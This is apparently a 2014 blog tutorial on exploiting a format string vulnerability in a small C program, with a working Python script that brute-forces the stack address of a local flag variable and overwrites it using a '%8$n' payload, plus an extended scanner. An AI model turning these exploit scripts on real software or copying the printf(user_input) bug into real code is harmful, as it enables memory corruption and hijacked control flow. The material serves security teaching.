Thursday, 22 May 2014

Exploiting format string vulnerability- Part 2

In my previous post about format string vulnerabilities, I explained how to overwrite a global variable to alter the program's control flow. This post is a continuation: we use the same example program again, but this time the variable 'flag' is a local variable of main. (To understand why that difference matters, please read the previous post.)

Task :
Give input such that “You entered right parameter” is printed out.

Program:

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char password[255];
    int flag;               /* local this time: lives in main's stack frame */
    flag = 0;
    /* strncpy does not NUL-terminate password if argv[1] is 255 bytes or longer */
    strncpy(password, argv[1], 255);
    printf("\nEntered password is : ");
    printf(password);       /* the bug: user input is used as the format string */
    printf("\n");
    if(flag)
    {
        printf("You entered right parameter\n");
    }
    else
    {
        printf("wrong input\n");
    }
    return 0;
}

....................................

The flag is not a global variable here. It is a local variable of main, which means it lives in main's stack frame instead of at a fixed address in the data section.
Get the address of 'flag' using gdb (for example with p &flag once you have stopped at a breakpoint inside main). As in the previous exploitation, we can overwrite the contents of that address with %n: it stores the number of characters printed so far by that printf call, which is never zero here, so any write that lands in flag makes the if(flag) branch succeed. But since flag is on the stack, its address shifts slightly when the program runs outside gdb: gdb adds environment variables such as LINES and COLUMNS and starts the program through its absolute path, and both of these move the stack. Two caveats follow from this. First, the stack address must be stable from run to run, i.e. ASLR must be disabled for the process (gdb does this for the debuggee by default; outside gdb, run the binary under setarch $(uname -m) -R or set /proc/sys/kernel/randomize_va_space to 0). Second, an address containing a 0x00 byte (such as 0xffffd300) cannot be delivered through argv[1] at all, because argv strings are NUL-terminated C strings.
So we need to test all the addresses around the one we got from gdb, and we write a script that does this for us.

(python script)

import struct
from subprocess import call

# Scan 100 candidate addresses starting from the value found with gdb
# (move the start address forward if the loop ends without a hit).
for i in range(0, 100):
    x = 0xffffd301 + i
    print(hex(x))
    y = struct.pack("<I", x)      # address as 4 little-endian bytes (32-bit target)
    print(y)
    # The "AAA" padding and the argument index 8 must put the address bytes
    # exactly in the stack slot that %8$n reads; %n then writes the character
    # count (7 here) to address x.
    call([b"./2", b"AAA" + y + b"%8$n"])

The address obtained from gdb is 0xffffd2ec.

Print and try to overwrite the addresses around this address. If no correct result is obtained, replace the start address in the for loop with the last address checked so far and keep running the loop until the program prints "You entered right parameter".

Exit gdb and run the script outside gdb. The flag's address will be a little different from the one gdb showed, which is exactly why the loop scans a range instead of a single address.
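As an added example (not part of the original post), here is a more complete version of the scanning script: it builds the argv[1] payload, skips addresses that contain a NUL byte, captures the target's output and stops at the first address that makes the program print the success string. The binary name ./2, the "AAA" padding, the argument index 8, the success message and the gdb address 0xffffd2ec are taken from the post; the scan radius, the helper names and the runner parameter (which lets the search logic be exercised without the binary) are my own assumptions.

```python
import struct
import subprocess
import sys

# Success message printed by the vulnerable program on this page.
SUCCESS = b"You entered right parameter"


def has_nul_byte(addr):
    """True if the 32-bit little-endian encoding of addr contains 0x00.

    Such an address cannot be passed via argv: the C string ends at the NUL.
    """
    return b"\x00" in struct.pack("<I", addr)


def build_payload(addr, offset, prefix=b"AAA"):
    """argv[1] for one attempt: prefix + address + %<offset>$n.

    %n stores the number of bytes printed so far by that printf call
    (len(prefix) + 4 == 7 here), which is enough to make flag non-zero.
    prefix and offset must place the address in the stack slot that
    %<offset>$n reads; "AAA" and 8 are the values used in the post.
    Returns None for addresses that contain a NUL byte.
    """
    if has_nul_byte(addr):
        return None
    return prefix + struct.pack("<I", addr) + b"%" + str(offset).encode() + b"$n"


def candidate_addresses(center, radius):
    """Ascending addresses within +/- radius of the gdb value, minus NUL bytes.

    Scanning upwards matters: because the count (7) fits in one byte, a write
    at &flag-1, &flag-2 or &flag-3 leaves flag's bytes zero, so the first hit
    is the exact address of flag rather than a partially overlapping one.
    """
    return [a for a in range(center - radius, center + radius + 1)
            if not has_nul_byte(a)]


def run_target(binary, payload, timeout=5):
    """Run the binary once with payload as argv[1] and return its stdout.

    A crash or a hang simply yields output without the success string.
    """
    try:
        proc = subprocess.run([binary, payload], stdout=subprocess.PIPE,
                              stderr=subprocess.DEVNULL, timeout=timeout)
    except subprocess.TimeoutExpired:
        return b""
    return proc.stdout


def find_flag_address(binary, center, radius=0x40, offset=8, runner=run_target):
    """Return the first address around center whose %n write flips flag, or None."""
    for addr in candidate_addresses(center, radius):
        payload = build_payload(addr, offset)
        if SUCCESS in runner(binary, payload):
            return addr
    return None


if __name__ == "__main__":
    # Usage: python3 scan.py ./2 0xffffd2ec
    # Run with ASLR disabled (e.g. under `setarch $(uname -m) -R`), otherwise
    # the stack moves on every run and no fixed address can be found.
    target, center = sys.argv[1], int(sys.argv[2], 16)
    hit = find_flag_address(target, center)
    print("flag is at %s" % hex(hit) if hit is not None else "no hit in range")
```

The radius of 0x40 bytes on either side of the gdb value is a guess that covers the usual shift caused by gdb's extra environment variables and longer argv[0]; widen it if the scan comes back empty, and remember that every attempt is a separate process, so a segfault at one address does not stop the search.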